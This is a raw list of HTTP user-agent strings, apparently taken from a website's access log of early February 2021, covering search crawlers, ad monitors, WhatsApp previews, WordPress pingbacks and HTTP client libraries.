tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612226101-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612231560-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612255603-0 +yacybot (/global; amd64 Linux 5.10.0-2-amd64; java 16-ea; Europe/es) http://yacy.net/bot.html +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.147 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.2.18 A +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.143 Mobile Safari/537.36 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.114Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 PTST/210202.205918 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1612254778-60 +OSSProxy 1.3.338.326 (Build 338.326 Win32 en-us)(Oct 1 2020 18:44:57) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.4.2.659 (SpeedMode; Proxy; Android 7.0; SCV31 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4402.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +FDM/6.13.3.3555 +Google Update/1.3.36.52;winhttp;cup-ecdsa +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Mobile Safari/537.36 PTST/210202.205918 +python-requests/2.7.0 CPython/2.7.9 Windows/2012Server +WhatsApp/2.21.3.10 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.149 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.2.15 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612323197-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612355012-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210202.205918 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1612359547-60 +Guzzle/5.3.1 curl/7.68.0 PHP/7.3.27 +WordPress/3.7.5; http://apifencom.unblog.fr +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/90.0.4407.0 Safari/537.36 +GoogleAuth/1.4 (dreamqltesq PPR1.180610.011); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612399018-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612404446-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612452380-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612455057-0 +WhatsApp/2.2102.9 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612452381-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612396840-10 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.143 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612475582-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612475600-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.152 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612423145-0 +WhatsApp/2.21.3.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612446433-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612446447-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612446455-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 PTST/210204.144009 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Mobile Safari/537.36 PTST/210204.144009 +Charlotte: The Financial Institution Crawler - 2000ms of politeness, robot friendly crawling +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 4.4.4; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; AndersPinkBot/1.1; +http://anderspink.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210205.205803 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/190509.230546 PTST/210205.205803 +Deluge +WhatsApp/2.21.21.22 i +GuzzleHttp/6.5.1 curl/7.68.0 PHP/7.4.3 +WordPress/5.1.4; http://lavistapark.org; verifying pingback from 191.97.3.195 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612485457-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612485458-10 +Apache-HttpClient/4.5.3 (Java/1.8.0_275) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612560170-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612489550-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612499341-0 +WordPress/5.6.1; https://www.tecplac.com +WordPress/5.6.1; https://irrin.web.id +WhatsApp/2.21.3.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612540931-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612541078-0 +WordPress/5.6.1; https://www.tecdud.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612565516-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.153 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210202.205918 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.4; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210204.144009 +Google Chrome 53 (Win 10 x64): Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36 +WordPress/5.6.1; http://simplykaimuri.co.ke +WordPress/5.6.1; https://gorod-chel.ru +WordPress/5.6.1; https://loginplace.com +magpie-crawler/1.1 (robots-txt-checker; +http://www.brandwatch.net) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612516068-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612516066-0 +Mozilla/ (ipad; CPU OS 12_0 like Mac OS X) ApplewebKit/537.36 (Khtml, like geko) chrome/41.0.2272.96 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612571905-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612578451-0 +WordPress/5.6.1; https://onlinetoolweb.com +WordPress/5.4.4; https://kutikomi.love +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210205.205803 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) adbeat.com/policy Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612594872-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612639177-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612653999-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612580497-0 +WhatsApp/2.21.3.13 A +WordPress/5.6.1; https://dgtara.com +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.143 Safari/537.36 (compatible; Google-Shopping-Quality +http://www.google.com/merchants/tos/extend/RU/tos.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210206.150737 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210206.150737 +WordPress/5.6.1; https://roagame.ru +masscan/1.3 (https://github.com/robertdavidgraham/masscan) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/190509.230546 PTST/210206.150737 +RadiosNet/2.4.2 (Java; Android) +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.162 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.1; https://talentsy.ru; verifying pingback from 176.212.34.103 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612739308-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612658900-0 +WordPress/5.6.1; https://www.tecmaza.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612664980-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612684101-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612686025-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612686028-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612740098-0 +PHP_radiocampania.eu +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.163 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612828124-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210208.164710 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612743966-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612748792-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612796916-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612810018-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612810025-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612766008-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612770671-0 +Mozilla/5.0 (en-US) AppleWebKit/537.36 (KHTML, like Gecko; Widget Server) Chrome/88.0.4324.143 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210208.145922 +Mozilla/4.0 (Windows 10 10.0) Java/1.8.0_161 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.164 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.6.1; https://fantastikhit.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 7.0; IdeaTabA1000-G ) U2/1.0.0 Mobile +WordPress/5.6.1; https://blogchain.com.ua +WordPress/4.9.16; http://www.lmxfnh.co +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612760342-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612760340-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.5.2.1188 (SpeedMode; Proxy; Android 8.1.0; TECNO_LA7 ) U2/1.0.0 Mobile +GoogleAuth/1.4 (Seoul_TF QP1A.190711.020); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.163 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612862622-0 +Apache-HttpClient/UNAVAILABLE (Java/1.8.0_272) +Java/1.8.0_282 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 9; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612897249-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612905282-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612905279-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612905747-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612830806-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612832857-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612832860-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612834079-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612836028-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612840788-0 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.163 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612856723-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612863142-0 +WhatsApp/2.21.4.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612886375-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612890357-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210208.164710 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Mobile Safari/537.36 PTST/210209.171335 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.149 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +NetSurf/3.11 (Linux) +WordPress/5.6.1; http://repository.zeile1.local +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 10; SM-A015F ) U2/1.0.0 Mobile +WordPress/5.6.1; https://hello-papaye.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.1.1; IdeaTabA1000-G ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.175 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.0.1041 (SpeedMode; Proxy; Android 5.0.2; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612945324-0 +Tiny Tiny RSS/19.8 (f609065) (http://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612956950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612962610-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612964795-0 +Mozilla/4.0 (compatible; GoogleToolbar 7.5.8231.2252; Windows 10.0; MSIE 9.11.19041.0) +WhatsApp/2.21.4.4 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 PTST/210209.171335 +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/88.0.4324.143Safari/537.36 +WordPress/5.6.1; https://mikadotm.ru +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) mrs_image/1612969070-10 +curl/7.75.0 +Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; QQDownload 713; .NET CLR 2.0.50727; .NET4.0C; WOW64; .NET CLR 3.8.25433; Media Center PC 3.7) +WordPress/5.6.1; https://sologamers.net +WordPress/5.5.3; https://bithardware.top +WordPress/5.6.1; https://www.yacal.es +WordPress/5.4.2; https://thetechzone.online +https://go.eportalmobile.com/search/google?from=ume&pos=browser&c=US&brand={brand}&carrier={carrier}&model={model}&q=java.lang.RuntimeException%3A+Unable+to+start+receiver+com.zte.zdm.application.autoupdate.AlarmReceiver%3A+java.lang.NullPointerException%3A+Attempt+to+invoke+virtual+method+%27boolean+android.net.NetworkInfo.isRoaming%28%29%27+on+a+null+object+reference%0A%09at+android.app.ActivityThread.handleReceiver%28ActivityThread.java%3A3118%29%0A%09at+android.app.ActivityThread.-wrap18%28ActivityThread.java%29%0A%09at+android.app.ActivityThread%24H.handleMessage%28ActivityThread.java%3A1593%29%0A%09at+android.os.Handler.dispatchMessage%28Handler.java%3A102%29%0A%09at+android.os.Looper.loop%28Looper.java%3A163%29%0A%09at+android.app.ActivityThread.main%28ActivityThread.java%3A6228%29%0A%09at+java.lang.reflect.Method.invoke%28Native+Method%29%0A%09at+com.android.internal.os.ZygoteInit%24MethodAndArgsCaller.run%28ZygoteInit.java%3A886%29%0A%09at+com.android.internal.os.ZygoteInit.main%28ZygoteInit.java%3A776%29%0ACaused+by%3A+java.lang.NullPointerException%3A+Attempt+to+invoke+virtual+method+%27boolean+android.net.NetworkInfo.isRoaming%28%29%27+on+a+null+object+reference%0A%09at+com.zte.zdm.application.util.e.j%28Unkno%E2%80%A6 +GoogleAuth/1.4 (osprey_umts MPIS24.65-33.1-2-16); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613003231-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1613008607-0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +WordPress.com; http://wiert.me +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613057052-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613080814-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1613080819-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; 